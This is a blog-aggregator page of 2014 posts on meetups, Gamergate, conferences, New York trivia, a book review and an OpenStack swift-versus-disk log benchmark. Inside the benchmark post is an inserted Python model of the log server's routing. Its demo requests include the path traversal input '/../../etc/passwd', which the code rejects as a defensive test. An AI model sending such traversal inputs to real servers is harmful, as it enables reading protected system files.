Planet Russell


Worse Than Failure: Announcements: Tokyo Meet-up & Site Fixes

Tokyo readers -- I am once again visiting your fine city this week, and thought it'd be fun to try for another Tokyo/TDWTF meetup. Earlier this year, we got together at an izakaya for nomihoudai:

If you're unaware, nomihoudai is an easy way for a group of folks to get as much food and drink from the menu as they'd like for a set price over a set duration, without fussing over details like who ordered what and how many. While Japanese people often see this as a convenient offer, as an American I recognize it for the challenge it is -- and conquer it I shall!

So, if you're up for getting together this Friday (possibly Saturday?) in Shinjuku or Shibuya area, please drop me a note via the contact form or direct, apapadimoulis/inedo.com.

As for everyone else, thanks for submitting the bugs/issues/suggestions for the new site. We just fixed a bunch of them earlier today, and will continue to fix stuff as it comes in. Your help is greatly appreciated -- not just for submitting issues but for helping with fixed teh codez as well. If you're brave enough to explore the TDWTF codebase, I'll gladly send you some brand new TDWTF stickers with the updated logo.

Planet Debian: Junichi Uekawa: Migrating my diary system to some new server.

Migrating my diary system to some new server. I took the chance to migrate my system from a CVS-based system to a Git-based system. It no longer relies on a chain of CVS commit hooks, and now I have a makefile to publish. I also took the chance to rewrite my 15-year-old elisp so that I can use UTF-8 instead of a mix of ISO-2022-JP and EUC-JP. Dusting off some old code. No test exists, what could go wrong!

Geek Feminism: Fish Are Friends, Not Linkspam (21 October 2014)

#Gamergate

  • On Gamergate: a letter from the editor | Polygon (October 17): “Video games are capital “C” Culture now. There won’t be less attention, only more. There won’t be less scrutiny. There certainly won’t be less diversity, in the fiction of games themselves or in the demographics of their players. What we’re in control of is how we respond to that expansion, as journalists, as developers, as consumers. Step one has to be a complete rejection of the tools of harassment and fear — we can’t even begin to talk about the interesting stuff while people are literally scared for their lives. There can be no dialogue with a leaderless organization that both condemns and condones this behavior, depending on who’s using the hashtag.”
  • Gamergate threats: Why it’s so hard to prosecute the people targeting Zoe Quinn and Anita Sarkeesian | Slate (October 17): “The light penalties attached to many of these online crimes also deter officials from taking them seriously, because the punishment doesn’t justify the resources required to investigate and prosecute them”
  • Of Gamers, Gates, and Disco Demolition: The Roots of Reactionary Rage | The Daily Beast (October 16): “Our various “culture wars” tend to boil down to one specific culture war, the one about men wanting to feel like Real Men and lashing out at the women who won’t let them.”
  • Gamergate in Posterity | The Awl (October 15): “Maybe there will be some small measure of accountability in the far future, not just for public figures and writers and activists, but for all the people who could not or would not see their “trolling” for what it really was. Maybe, when their kids ask them what they were like when they were young, they will have no choice but to say: I was a piece of shit. I was part of a movement. I marched, in my sad way, against progress. Don’t take my word for it. You can Google it!”

We link to a variety of sources, some of which are personal blogs.  If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

Thanks to everyone who suggested links.


Planet Linux Australia: linux.conf.au News: Speaker Feature: Denise Paolucci, Gernot Heiser

Denise Paolucci

When Your Codebase Is Nearly Old Enough To Vote

11:35 am Friday 16th January 2015

Denise is one of the founders of Dreamwidth, a journalling site and open source project forked from Livejournal, and one of only two majority-female open source projects.

Denise has appeared at multiple open source conferences to speak about Dreamwidth, including OSCON 2010 and linux.conf.au 2010.

For more information on Denise and her presentation, see here.


Gernot Heiser

seL4 Is Free - What Does This Mean For You?

4:35pm Thursday 15th January 2015

Gernot is a Scientia Professor and the John Lions Chair for operating systems at the University of New South Wales (UNSW).

He is also leader of the Software Systems Research Group (SSRG) at NICTA. In 2006 he co-founded Open Kernel Labs (OK Labs, acquired in 2012 by General Dynamics) to commercialise his L4 microkernel technology.

For more information on Gernot and his presentation, see here. You can follow him as @GernotHeiser and don’t forget to mention #LCA2015.

TED: 10 weird things I accidentally learned about New York

New York, New York, it’s a wonderful town! Here’s one of my favorite images of it, created by George Schlegel lithographers in 1873, while the Brooklyn Bridge was under construction. Image: Wikipedia

New York is a playground of absurdity. I’ve lived here on and off for the past decade. Since I ate my first workday lunch in a “park” in downtown Manhattan, I’ve been blindly accepting everyone’s inexplicable behavior in this city, not least of all the block-long cronut line I pass on my way to work every morning. So when I started curating the speaker program for TEDxNewYork — which is less than two weeks away — it seemed a productively impossible task: to expand my view beyond my own little pocket of the city.

New York is an extrovert, leading and looking forward, not looking underground, inside or backwards. So finding local speakers with ideas that haven’t yet surfaced has been surprisingly difficult. But during our curation research, my team and I fell down a lot of research rabbit holes, each leading to something we just didn’t know about New York’s underbelly. Doing research like this means a lot of nights on the Internet — Wikipedia lists, New Yorker archives, the tables of contents of academic publications, Reddit — but also just talking to people — to strangers in bars, to your friend about their dissertation, to others standing on the subway platform. Once people know you’re looking for local stories, they start volunteering weird information. When you hear about a person, place or thing from multiple sources before NPR or The New York Times has caught on, you start to connect the dots as to what’s about to break out.

Keeping your ear to the dirty Manhattan ground doesn’t always yield great TEDx Talks, but it does make for good watercooler conversation. Below, 10 facts we learned from our research that we thought you’d enjoy.

  1. City Hall used to be a place for “sturdy beggars.” In 1735, New York built its first almshouse where City Hall is today. According to urban archaeologist Alyssa Loorya, one of our speakers, “It served five groups: ‘Poor Needy Persons,’ ‘Idle Wandering Vagabonds,’ ‘Sturdy Beggars,’ ‘Parents of Bastard Children,’ and the ‘bastard’ children.”
  2. If you drop your Blackberry into the subway tracks, you can get it back from these guys. Dubbed “the fishermen of the subway” they use homemade tools to recover the things New Yorkers drop on the tracks.
  3. One fire hydrant and a badly designed parking spot can net the city $33,000 in a year. But: Thanks to speaker Ben Wellington, who first posted this data on his blog, the city also shows that it can self-correct.
  4. Some subway buskers have agents. We were surprised to discover this when we approached one.
  5. New York State is buying out 750 homes in Staten Island and Long Island as a strategy to protect against future hurricanes. The City, which normally favors rebuilding over demolishing, turned down residents, so the people of Staten Island went over their heads to the State. A friend in an urban planning program at MIT told me about this over a beer one night recently, and I can’t say I’ve met one Manhattanite who knows about it.
  6. The ubiquitous voice of subway announcements lives in Maine. Her name is Carolyn Hopkins, and she does non-New York gigs, too: She’s the voice of 200 different airports.
  7. As of June this year, New York now has a Morbid Anatomy Museum. You can take workshops there on some pretty weird stuff.
  8. There are only two states in the US that automatically charge 16- and 17-year-olds as adults, and New York is one of them. Unhealthy jail systems have been in the news quite a bit since Preet Bharara, the US attorney in Manhattan, published a lengthy report in August on treatment of teens in Rikers Island. Now as solitary confinement for teens at Rikers comes to an end we turn to our speaker Ismael Nazario, who was in solitary in Rikers for over 300 days before ever being convicted of a crime, to hear his story.
  9. The James A. Farley Post Office, the enormous historic building next to Penn Station bears the inscription: “Neither snow nor rain nor heat nor gloom of night stays these couriers from the swift completion of their appointed rounds.” You can take a tour of the nearly empty building, or even have a fashion show. (You can also try to have a TEDx event there. Not that we would know.)
  10. Oh, and one thing everyone knows: The Rent is (still) 2 Damn High.

TEDxNewYork 2014 — themed “Grand, central” — will take place on November 1, in Williamsburg, Brooklyn. Find out more.


Racialicious: Who We Be Examines the War on Multiculturalism

“Color is not a human or a personal reality, it is a political reality.” – James Baldwin

This is not a book review, because Who We Be isn’t really a book. It’s more of a thoughtful examination of how the United States arrived at this point in racial history.

Long time friend of the blog Jeff Chang is the author of the American Book award winning Can’t Stop, Won’t Stop: A History of the Hip Hop Generation and editor of the anthology Total Chaos: The Art and Aesthetics of Hip Hop. To say we’ve been waiting for Who We Be is an understatement.

But in the introduction, Chang frames the core of the most recent case of racial backlash. Explaining the outsized reaction by some whites to President Obama, Chang notes:

In the 1830s white minstrels had put on blackface, creating space for the white working class to challenge the elite, while keeping Blacks locked into their racial place. Obama now appeared as a dual symbol of oppression. Because of his Blackness, he was even more of an outsider—and in that sense, even more American—than them. But he was also the president. His Blackness did not just confer moral and existential claims, it was backed by the power of the state.

And there went everything.

As much as we like to talk about the inevitability of America being majority-minority in 2042, the events playing out across the nation show that most places are outright hostile to the idea that people of color are equal Americans, with the same rights, privileges, representation, and agenda setting power bestowed to whites. Chang turns his critical eye to shifts in culture, which become documentation of the rise (and fall?) of multiculturalism.

The opening chapter is on the funny pages and American comic culture acting as a barometer for race relations. Chang finds amazing gems – Morrie Turner’s Wee Pals frames the narrative since Turner was the first black syndicated cartoonist, but we also hear about the work of Jackie Ormes, Gus Arriola, Barbara Brandon-Croft, Ray Billingsley, George Harriman, Robb Armstrong, and Oliver Harrington.

Chang also points to the variety of issues at play in cartoons like the friendly Sambo model that led to popular characters like Felix the Cat, Mickey Mouse, and Bugs Bunny. Racism was even in the inking – comics used three colors: black, white, and the pinkish “flesh” tone. Anyone who did not conform became odd tones of purple. The modern world of comics hasn’t improved much – even with established cartoonists like Lalo Alcaraz and Keith Knight doing their thing, the Sunday comics pages have stubbornly resisted full integration.

From comics, Chang moves to art and the marketing of identity. Then on to politics, culture, the DREAMers, politics, war, neoliberalism, capitalism, Occupy Wall Street and more in a bid to make racial sense of the country’s political mood.

While reading, one could wonder if society learned anything from the past 40 years? Or has polite society only learned to spout the “correct” answers? Later in the book, Chang discusses the phenomenon of people saying they want diversity, but seeing the reality play out in one of the biggest areas of segregation in America – housing:

How much did Americans value diversity and integration? Over the course of four decades, the Gallup survey had asked whites, “Would you move if great numbers of Blacks moved into your neighborhood?” In 1958, 79% said they would. In 1997, 75% said they would not. A month after Obama’s victory, a report from the Pew Research Center showed that almost 2 in 3 Americans—including 52% of Republicans, 60% of whites, 83% of Blacks, and 76% of 18-29 year olds—said that they preferred to live in a community made up of people who were a mix of different races. The numbers were similar for religious, political, and socioeconomic diversity.

Fully 68% of those making $100,000 or more a year—a significantly larger proportion than every other income bracket—said they preferred to live in a community with a mix of economic classes. But when Stanford professors Sean F. Reardon and Kendra Bischoff examined the data from 1970 to 2009, they found that not only had residential segregation by income soared, the wealthy had segregated themselves the fastest.

Large majorities told pollsters they wanted integrated schools and diversity in education. Pundits and politicians would often trot out such these polls as cause for optimism around racial justice issues. But in light of the actual social facts, the survey data looked less like an emerging consensus for cultural equity than evidence that multiculturalism had made some better primed to answer the questions “correctly.” For in this colorized generation, public schools were resegregating at a dramatic rate.

By 2010, 80% of Latinos and 74% of Blacks attended majority non-white schools. Around 40% of Blacks and Latinos in public schools attended hypersegregated schools in which 90-100% of the students were nonwhite. Blacks and Latinos were also twice as likely to attend a school predominantly serving low-income students than white or Asian students. White students were the most racially isolated of all—the average white student attended a school that was 75% white.

Resegregation did not escape even the rapidly diversifying suburbs or the most liberal strongholds. From city to exurb, the San Francisco Bay Area— one of the nation’s most diverse regions, the birthplace of the multiculturalism movement, and the site of Berkeley’s national model public school desegregation program—also boasted California’s highest rates of White isolation. Although white students made up only 28% of the Bay Area’s student-age population, 65% of them attended majority white schools. Those schools were eight times less likely than predominantly non-white ones to be deemed “high-problem” schools.

After 1968, busing, court orders, and district plans had helped to integrate the schools from the deep South to the Northwest. In turn school desegregation climbed sharply and peaked in the late 1980s. But then conservative challenges to desegregation mounted, and anti-integrationists began to accumulate victories in the courts and the legislatures. During the 1990s, while multiculturalists were winning the battle to change school curriculum and staffing, they were losing the battle to desegregate the next generation of public school students. By the new millennium, the same southern school systems that had made the most progress toward integration were the fastest to resegregate. Progress had always been fragile.

The book ends on equal parts heartbreak and hope, juxtaposing a few different stories to paint a picture of where we are.

The ambiguous ending fits the overall theme of the book – after all, isn’t that what we go through as people of color everyday?

Ultimately, Who We Be can feel a little disjointed – condensing America’s entire racial history in imagery is a major feat, and the book is much better at raising ideas and questions than providing concrete answers. But anyone who cares about racial equity should read this book – if for nothing else than to supply the foundation for our action.

Racialicious is giving away a copy of Who We Be. To enter, leave a comment addressing this question: “What does multiculturalism mean now and what needs to happen next?”

Oreilly Linux Planet: Tizen Cookbook

Tizen is an open source Linux-based software platform for a variety of devices, from smartphones and watches to in-vehicle infotainment. Application development is based on open standards and HTML5 is the primary development technology.

Starting with a detailed description of using the Tizen SDK, you will delve into Tizen development on Linux, Windows, and Mac OS with this book. You will learn to use the Tizen IDE and move on to using the web simulator and device emulator.

The recipes in this book are invaluable in exploring and optimizing Tizen to develop exciting mobile and web applications.

Geek Feminism: Quick hit: A good example of how to handle trolls

With his permission, I’m reposting this blog comment from Marco Rogers, in a reply to an anti-feminist comment on a blog post about women in tech that he wrote 2 1/2 years ago. Although the post is that old, the comment is from a few days ago, because even years later, anti-feminist trolls are stumbling across Marco’s blog post and feeling the need to express their displeasure with it.

I’m reposting Marco’s comment because I think it’s a good example about how to respond to a troll. I would love to see more men let their anti-feminist peers know that uninformed anti-feminist wankery is a waste of time. And I would love to do that more often myself, rather than engaging with it.

Hi [REDACTED]. I thought a long time about whether to let this comment stand or delete it. I do listen to input from different perspectives. I read this entire thing. And I’m sorry to say it was a waste of my time.

I’m afraid this reply won’t be very constructive. I had to choose whether to waste further time dismantling your false logic, and I had to take into account whether it would make any difference to you or anyone reading. I don’t think it will. In my experience, it’s very difficult to educate men who think like you do.

I’ll admit it also annoys me that you would come and write a small novel in my blog comments but not say anything new or original. Men have been making this argument that their long history of sexism is somehow the natural order of things since the beginning of time. It’s not revelatory, it’s not some profound wisdom that people haven’t heard, it’s boring. The feminist/womanist movement grew in direct opposition to all the nonsense you spouted above. There is a ton of literature that debunks and rejects every single point you are poorly trying to make. The least you can do is educate yourself on the system you’re up against, so you can sound more cogent and have an actual chance of convincing anyone.

The question remains of whether I let your comment stay up. I think I will. Not because I feel compelled to represent multiple viewpoints here. This is my blog and I choose what goes here. But I’ll leave it because I’m no longer afraid of letting people read tripe like this. You’re losing. We WILL create a world where the mentality of men like you is a minority and women get to exist as themselves without fear. You can’t stop it. Stay mad bro. Thanks for dropping by.

Planet Debian: DebConf team: DebConf15 dates are set, come and join us! (Posted by DebConf15 team)

At DebConf14 in Portland, Oregon, USA, next year’s DebConf team presented their conference plans and announced the conference dates: DebConf15 will take place from 15 to 22 August 2015 in Heidelberg, Germany. On the Open Weekend on 15/16 August, we invite members of the public to participate in our wide offering of content and events, before we dive into the more technical part of the conference during the following week. DebConf15 will also be preceded by DebCamp, a time and place for teams to gather for intensive collaboration.

A set of slides from a quick show-case during the DebConf14 closing ceremony provide a quick overview of what you can expect next year. For more in-depth information, we invite you to watch the video recording of the full session, in which the team provides detailed information on the preparations so far, location and transportation to the venue at Heidelberg, the different rooms and areas at the Youth Hostel (for accommodation, hacking, talks, and social activities), details about the infrastructure that are being worked on, and the plans around the conference schedule.

We invite everyone to join us in organising this conference. There are different areas where your help could be very valuable, and we are always looking forward to your ideas. Have a look at our wiki page, join our IRC channels and subscribe to our mailing lists.

We are also contacting potential sponsors from all around the globe. If you know any organisation that could be interested, please consider handing them our sponsorship brochure or contact the fundraising team with any leads.

Let’s work together, as every year, on making the best DebConf ever!

Planet Linux Australia: Joshua Hesketh: OpenStack infrastructure swift logs and performance

Turns out I’m not very good at blogging very often. However I thought I would put what I’ve been working on for the last few days here out of interest.

For a while the OpenStack Infrastructure team have wanted to move away from storing logs on disk to something more cloudy – namely, swift. I’ve been working on this on and off for a while and we’re nearly there.

For the last few weeks the openstack-infra/project-config repository has been uploading its CI test logs to swift as well as storing them on disk. This has given us the opportunity to compare the last few weeks of data and see what kind of effects we can expect as we move assets into an object storage.

  • I should add a disclaimer/warning, before you read, that my methods here will likely make statisticians cringe horribly. For the moment though I’m just getting an indication for how things compare.

The set up

Fetching files from an object storage is nothing particularly new or special (CDNs have been doing it for ages). However, for our usage we want to serve logs with os-loganalyze giving the opportunity to hyperlink to timestamp anchors or filter by log severity.

First though we need to get the logs into swift somehow. This is done by having the job upload its own logs. Rather than using (or writing) a Jenkins publisher we use a bash script to grab the job’s own console log (pulled from the Jenkins web ui) and then upload it to swift using credentials supplied to the job as environment variables (see my zuul-swift contributions).

This does, however, mean part of the logs are missing. For example the fetching and upload processes write to Jenkins’ console log but because it has already been fetched these entries are missing. Therefore this wants to be the very last thing you do in a job. I did see somebody do something similar where they keep the download process running in a fork so that they can fetch the full log but we’ll look at that another time.

When a request comes into logs.openstack.org, a request is handled like so:

  1. apache vhost matches the server
  2. if the request ends in .txt.gz, console.html or console.html.gz rewrite the url to prepend /htmlify/
  3. if the requested filename is a file or folder on disk, serve it up with apache as per normal
  4. otherwise rewrite the requested file to prepend /htmlify/ anyway

os-loganalyze is set up as a WSGIScriptAlias at /htmlify/. This means all files that aren’t on disk are sent to os-loganalyze (or if the file is on disk but matches a file we want to mark up it is also sent to os-loganalyze). os-loganalyze then does the following:

  1. Checks the requested file path is legitimate (or throws a 400 error)
  2. Checks if the file is on disk
  3. Checks if the file is stored in swift
  4. If the file is found, markup (such as anchors) is optionally added and the request is served
    1. When serving from swift the file is fetched via the swiftclient by os-loganalyze in chunks and streamed to the user on the fly. Obviously fetching from swift will have larger network consequences.
  5. If no file is found, 404 is returned

If the file exists both on disk and in swift then step #2 can be skipped by passing ?source=swift as a parameter (thus only attempting to serve from swift). In our case the files exist both on disk and in swift since we want to compare the performance so this feature is necessary.
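The lookup order described above, modeled as an added example (this is not os-loganalyze's own code or the real Apache configuration). The function names are hypothetical, a dict stands in for swift, and treating "legitimate" as "resolves inside the log root" is an assumption; markup is omitted.

```python
import os
import tempfile

# Suffixes Apache always hands to /htmlify/ (step 2 of the vhost rules above).
MARKUP_SUFFIXES = (".txt.gz", "console.html", "console.html.gz")
CHUNK = 64 * 1024


def safe_join(log_root, url_path):
    """Map a URL path to (absolute path, object name), or None if it escapes log_root.

    Assumption: "legitimate" means the resolved path stays inside the log root.
    realpath() collapses ".." and follows symlinks before the containment test.
    """
    if "\x00" in url_path:
        return None
    root = os.path.realpath(log_root)
    full = os.path.realpath(os.path.join(root, url_path.lstrip("/")))
    if full != root and not full.startswith(root + os.sep):
        return None
    return full, os.path.relpath(full, root).replace(os.sep, "/")


def stream_file(path):
    """Yield a file from disk in fixed-size chunks."""
    with open(path, "rb") as fh:
        while chunk := fh.read(CHUNK):
            yield chunk


def stream_object(data):
    """Stand-in for a chunked swift download: yields the object piecewise."""
    for i in range(0, len(data), CHUNK):
        yield data[i:i + CHUNK]


def apache_route(url_path, log_root):
    """Vhost steps 2-4: choose between plain static serving and /htmlify/."""
    if url_path.endswith(MARKUP_SUFFIXES):
        return "htmlify"
    resolved = safe_join(log_root, url_path)
    if resolved and os.path.exists(resolved[0]):
        return "static"
    return "htmlify"  # not on disk (or not resolvable): os-loganalyze decides


def os_loganalyze(url_path, params, log_root, swift_objects):
    """Lookup steps 1-5; returns (status, source, body iterator)."""
    resolved = safe_join(log_root, url_path)
    if resolved is None:
        return 400, None, iter(())              # step 1: path check failed
    full, name = resolved
    # ?source=swift skips the disk check (step 2) entirely.
    if params.get("source") != "swift" and os.path.isfile(full):
        return 200, "disk", stream_file(full)
    if name in swift_objects:                   # step 3
        return 200, "swift", stream_object(swift_objects[name])
    return 404, None, iter(())                  # step 5


def handle_request(url_path, params, log_root, swift_objects):
    """Full path of one request through the vhost and, if needed, os-loganalyze."""
    if apache_route(url_path, log_root) == "static":
        full, _ = safe_join(log_root, url_path)
        if os.path.isdir(full):
            listing = "\n".join(sorted(os.listdir(full))).encode()
            return 200, "apache", iter((listing,))
        return 200, "apache", stream_file(full)
    return os_loganalyze(url_path, params, log_root, swift_objects)


def demo():
    """Run constructed requests against a throwaway log root and a fake swift."""
    with tempfile.TemporaryDirectory() as root:
        job = os.path.join(root, "12", "job")
        os.makedirs(job)
        for fname, body in (("console.html", b"disk console\n"),
                            ("results.xml", b"<r/>\n")):
            with open(os.path.join(job, fname), "wb") as fh:
                fh.write(body)
        swift = {"12/job/console.html": b"swift console\n",
                 "13/job/swift-only.log": b"only in swift\n"}
        requests = [
            ("/12/job/results.xml", {}),                    # plain file: Apache
            ("/12/job/console.html", {}),                   # marked up, from disk
            ("/12/job/console.html", {"source": "swift"}),  # forced to swift
            ("/13/job/swift-only.log", {}),                 # only exists in swift
            ("/../../etc/passwd", {}),                      # escapes the log root
            ("/12/job/missing.log", {}),                    # nowhere
        ]
        results = []
        for path, params in requests:
            status, source, body = handle_request(path, params, root, swift)
            results.append((path, status, source, b"".join(body)))
        return results


if __name__ == "__main__":
    for row in demo():
        print(row)
```
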

So now that we have the logs uploaded into swift and stored on disk we can get into some more interesting comparisons.

Testing performance process

My first attempt at this was simply to fetch the files from disk and then from swift and compare the results. A crude little python script did this for me: http://paste.openstack.org/show/122630/

The script fetches a copy of the log from disk and then from swift (both through os-loganalyze and therefore marked-up) and times the results. It does this in two scenarios:

  1. Repeatedly fetching the same file over again (to get a good average)
  2. Fetching a list of recent logs from gerrit (using the gerrit api) and timing those

I then ran this in two environments.

  1. On my local network the other side of the world to the logserver
  2. On 5 parallel servers in the same DC as the logserver

Running on my home computer likely introduced a lot of errors due to my limited bandwidth, noisy network and large network latency. To help eliminate these errors I also tested it on 5 performance servers in the Rackspace cloud next to the log server itself. In this case I used ansible to orchestrate the test nodes thus running the benchmarks in parallel. I did this since in real world use there will often be many parallel requests at once affecting performance.

The following metrics are measured for both disk and swift:

  1. request sent – time taken to send the http request from my test computer
  2. response – time taken for a response from the server to arrive at the test computer
  3. transfer – time taken to transfer the file
  4. size – filesize of the requested file

The total time can be found by adding the first 3 metrics together.

 

Results

Home computer, sequential requests of one file

 

The complementary colours are the same metric and the darker line represents swift’s performance (over the lighter disk performance line). The vertical lines over the plots are the error bars while the fetched filesize is the column graph down the bottom. Note that the transfer and file size metrics use the right axis for scale while the rest use the left.

As you would expect the requests for both disk and swift files are more or less comparable. We see a more noticeable difference on the responses though with swift being slower. This is because disk is checked first, and if the file isn’t found on disk then a connection is sent to swift to check there. Clearly this is going to be slower.

The transfer times are erratic and varied. We can’t draw much from these, so let’s keep analyzing deeper.

The total time from request to transfer can be seen by adding the times together. I didn’t do this as when requesting files of different sizes (in the next scenario) there is nothing worth comparing (as the file sizes are different). Arguably we could compare them anyway as the log sizes for identical jobs are similar but I didn’t think it was interesting.

The file sizes are there for interest’s sake but as expected they never change in this case.

You might notice that the end of the graph is much noisier. That is because I’ve applied some rudimentary data filtering.

| | request sent (ms) – disk | request sent (ms) – swift | response (ms) – disk | response (ms) – swift | transfer (ms) – disk | transfer (ms) – swift | size (KB) – disk | size (KB) – swift |
|---|---|---|---|---|---|---|---|---|
| Standard Deviation | 54.89516183 | 43.71917948 | 56.74750291 | 194.7547117 | 849.8545127 | 838.9172066 | 7.121600095 | 7.311125275 |
| Mean | 283.9594368 | 282.5074598 | 373.7328851 | 531.8043908 | 5091.536092 | 5122.686897 | 1219.804598 | 1220.735632 |

 

I know it’s argued as poor practice to remove outliers using twice the standard deviation, but I did it anyway to see how it would look. I only did one pass at this even though I calculated new standard deviations.

 

| | request sent (ms) – disk | request sent (ms) – swift | response (ms) – disk | response (ms) – swift | transfer (ms) – disk | transfer (ms) – swift | size (KB) – disk | size (KB) – swift |
|---|---|---|---|---|---|---|---|---|
| Standard Deviation | 13.88664039 | 14.84054789 | 44.0860569 | 115.5299781 | 541.3912899 | 515.4364601 | 7.038111654 | 6.98399691 |
| Mean | 274.9291111 | 276.2813889 | 364.6289583 | 503.9393472 | 5008.439028 | 5013.627083 | 1220.013889 | 1220.888889 |

 

I then moved the outliers to the end of the results list instead of removing them completely and used the newly calculated standard deviation (ie without the outliers) as the error margin.

Then to get a better indication of what are average times I plotted the histograms of each of these metrics.

Here we can see a similar request time.
 

Here it is quite clear that swift is slower at actually responding.
 

Interestingly both disk and swift sources have a similar total transfer time. This is perhaps an indication of my network limitation in downloading the files.

 

Home computer, sequential requests of recent logs

Next from my home computer I fetched a bunch of files in sequence from recent job runs.

 

 

Again I calculated the standard deviation and average to move the outliers to the end and get smaller error margins.

| | request sent (ms) – disk | request sent (ms) – swift | response (ms) – disk | response (ms) – swift | transfer (ms) – disk | transfer (ms) – swift | size (KB) – disk | size (KB) – swift |
|---|---|---|---|---|---|---|---|---|
| Standard Deviation | 54.89516183 | 43.71917948 | 194.7547117 | 56.74750291 | 849.8545127 | 838.9172066 | 7.121600095 | 7.311125275 |
| Mean | 283.9594368 | 282.5074598 | 531.8043908 | 373.7328851 | 5091.536092 | 5122.686897 | 1219.804598 | 1220.735632 |
| Second pass without outliers | | | | | | | | |
| Standard Deviation | 13.88664039 | 14.84054789 | 115.5299781 | 44.0860569 | 541.3912899 | 515.4364601 | 7.038111654 | 6.98399691 |
| Mean | 274.9291111 | 276.2813889 | 503.9393472 | 364.6289583 | 5008.439028 | 5013.627083 | 1220.013889 | 1220.888889 |

 

What we are probably seeing here with the large number of slower requests is network congestion in my house. Since the script requests disk, swift, disk, swift, disk.. and so on this evens it out causing a latency in both sources as seen.
 

Swift is very much slower here.

 

Although comparable in transfer times. Again this is likely due to my network limitation.
 

The size histograms don’t really add much here.
 

Rackspace Cloud, parallel requests of same log

Now to reduce latency and other network effects I tested fetching the same log over again in 5 parallel streams. Granted, it may have been interesting to see a machine close to the log server do a bunch of sequential requests for the one file (with little other noise) but I didn’t do it at the time unfortunately. Also we need to keep in mind that others may be accessing the log server and therefore any request in both my testing and normal use is going to have competing load.
 

I collected a much larger amount of data here making it harder to visualise through all the noise and error margins etc. (Sadly I couldn’t find a way of linking to a larger google spreadsheet graph). The histograms below give a much better picture of what is going on. However out of interest I created a rolling average graph. This graph won’t mean much in reality but hopefully will show which is faster on average (disk or swift).
 

You can see that, now that we’re closer to the server, swift is noticeably slower. This is confirmed by the averages:

 

| | request sent (ms) – disk | request sent (ms) – swift | response (ms) – disk | response (ms) – swift | transfer (ms) – disk | transfer (ms) – swift | size (KB) – disk | size (KB) – swift |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Standard Deviation | 32.42528982 | 9.749368282 | 245.3197219 | 781.8807534 | 1082.253253 | 2737.059103 | 0 | 0 |
| Mean | 4.87337544 | 4.05191168 | 39.51898688 | 245.0792916 | 1553.098063 | 4167.07851 | 1226 | 1232 |
| Second pass without outliers | | | | | | | | |
| Standard Deviation | 1.375875503 | 0.8390193564 | 28.38377158 | 191.4744331 | 878.6703183 | 2132.654898 | 0 | 0 |
| Mean | 3.487575109 | 3.418433003 | 7.550682037 | 96.65978872 | 1389.405618 | 3660.501404 | 1226 | 1232 |

 

Even once outliers are removed we’re still seeing a large latency from swift’s response.

The standard deviation in the requests has now gotten very small. We’ve clearly made a difference moving closer to the logserver.

 

Very nice and close.
 

Here we can see that for roughly half the requests the response time was the same for swift as for the disk. It’s the other half of the requests bringing things down.
 

The transfer for swift is consistently slower.

 

Rackspace Cloud, parallel requests of recent logs

Finally I ran just over a thousand requests in 5 parallel streams from computers near the logserver for recent logs.

 

Again the graph is too crowded to see what is happening so I took a rolling average.

 

 

| | request sent (ms) – disk | request sent (ms) – swift | response (ms) – disk | response (ms) – swift | transfer (ms) – disk | transfer (ms) – swift | size (KB) – disk | size (KB) – swift |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Standard Deviation | 0.7227904332 | 0.8900549012 | 434.8600827 | 909.095546 | 1913.9587 | 2132.992773 | 6.341238774 | 7.659678352 |
| Mean | 3.515711867 | 3.56191383 | 145.5941102 | 189.947818 | 2427.776165 | 2875.289455 | 1219.940039 | 1221.384913 |
| Second pass without outliers | | | | | | | | |
| Standard Deviation | 0.4798803247 | 0.4966553679 | 109.6540634 | 171.1102999 | 1348.939342 | 1440.2851 | 6.137625464 | 7.565931993 |
| Mean | 3.379718381 | 3.405770445 | 70.31323922 | 86.16522485 | 2016.900047 | 2426.312363 | 1220.318912 | 1221.881335 |

 

The averages here are much more reasonable than when we continually tried to request the same file. Perhaps we’re hitting limitations with swift’s serving abilities.

 

I’m not sure why we have a sinc function here. A network expert may be able to tell you more. As far as I know this isn’t important to our analysis other than the fact that both disk and swift match.
 

Here we can now see swift keeping a lot closer to disk results than when we only requested the one file in parallel. Swift is still, unsurprisingly, slower overall.
 

Swift still loses out on transfers but again does a much better job of keeping up.
 

Error sources

I haven’t accounted for any of the following swift intricacies (in terms of caches etc) for:

  • Fetching random objects
  • Fetching the same object over and over
  • Fetching in parallel multiple different objects
  • Fetching the same object in parallel

I also haven’t done anything to account for things like file system caching, network profiling, noisy neighbours etc etc.

os-loganalyze tries to keep authenticated with swift, however

  • This can timeout (causes delays while reconnecting, possibly accounting for some spikes?)
  • This isn’t thread safe (are we hitting those edge cases?)

We could possibly explore getting longer authentication tokens or having os-loganalyze pull from an unauthenticated CDN to add the markup and then serve. I haven’t explored those here though.

os-loganalyze also handles all of the requests not just from my testing but also from anybody looking at OpenStack CI logs. In addition to this it also needs to deflate the gzip stream if required. As such there is potentially a large unknown (to me) load on the log server.

In other words, there are plenty of sources of errors. However I just wanted to get a feel for the general responsiveness compared to fetching from disk. Both sources had noise in their results so it should be expected in the real world when downloading logs that it’ll never be consistent.

Conclusions

As you would expect the request times are pretty much the same for both disk and swift (as mentioned earlier) especially when sitting next to the log server.

The response times vary but looking at the averages and the histograms these are rarely large. Even in the case where requesting the same file over and over in parallel caused responses to go slow these were only in the magnitude of 100ms.

The response time is the important one as it indicates how soon a download will start for the user. The total time to stream the contents of the whole log is seemingly less important if the user is able to start reading the file.

One thing that wasn’t tested was streaming of different file sizes. All of the files were roughly the same size (being logs of the same job). For example, what if the asset was a few gigabytes in size, would swift have any significant differences there? In general swift was slower to stream the file but only by a few hundred milliseconds for a megabyte. It’s hard to say (without further testing) if this would be noticeable on large files where there are many other factors contributing to the variance.

Whether or not these latencies are an issue is relative to how the user is using/consuming the logs. For example, if they are just looking at the logs in their web browser on occasion they probably aren’t going to notice a large difference. However if the logs are being fetched and scraped by a bot then it may see a decrease in performance.

Overall I’ll leave deciding on whether or not these latencies are acceptable as an exercise for the reader.

Racialicious: On DC Entertainment, Cyborg, And Going Back To The Afrofuture

By Arturo R. García

DC Entertainment scored a rare PR victory over archrival Marvel over the weekend when it announced its upcoming slate of films. At first glance, this latest take on the DC movie universe instantly puts Marvel’s to shame when it comes to inclusion.

